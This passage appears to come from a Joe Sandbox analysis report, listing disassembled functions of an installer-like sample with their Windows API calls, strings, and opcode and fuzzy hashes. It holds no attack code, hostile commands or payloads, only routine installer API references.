                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                          • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                          • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                          • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                          • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                          • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                          • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                          APIs
                                                            • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          Strings
                                                          • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                          • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                          • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                          • API String ID: 1697273262-1764544995
                                                          • Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                          • Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
                                                          • Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
                                                          • Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00404902
                                                          • CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970
                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID: $@rD
                                                          • API String ID: 3748168415-881980237
                                                          • Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                          • Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
                                                          • Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
                                                          • Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD
                                                          APIs
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                            • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                            • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                          • lstrlenW.KERNEL32 ref: 004026B4
                                                          • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                          • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                          • String ID: CopyFiles "%s"->"%s"
                                                          • API String ID: 2577523808-3778932970
                                                          • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                          • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                          • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                          • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: lstrcatwsprintf
                                                          • String ID: %02x%c$...
                                                          • API String ID: 3065427908-1057055748
                                                          • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                          • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                          • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                          • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                          APIs
                                                          • OleInitialize.OLE32(00000000), ref: 00405057
                                                            • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                          • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                          • String ID: Section: "%s"$Skipping section: "%s"
                                                          • API String ID: 2266616436-4211696005
                                                          • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                          • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                          • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                          • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00402100
                                                          • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                          • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                          • String ID:
                                                          • API String ID: 1599320355-0
                                                          • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                          • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                          • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                          • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                          APIs
                                                            • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                          • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                          • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                          • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: lstrcpyn$CreateFilelstrcmp
                                                          • String ID: Version
                                                          • API String ID: 512980652-315105994
                                                          • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                          • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                          • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                          • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                          • GetTickCount.KERNEL32 ref: 00403303
                                                          • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                          • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                          • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                          • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                          • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                          • String ID:
                                                          • API String ID: 2883127279-0
                                                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                          APIs
                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringlstrcmp
                                                          • String ID: !N~
                                                          • API String ID: 623250636-529124213
                                                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                          • CloseHandle.KERNEL32(?), ref: 00405C71
                                                          Strings
                                                          • Error launching installer, xrefs: 00405C48
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                          APIs
                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                          • API String ID: 3509786178-2769509956
                                                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
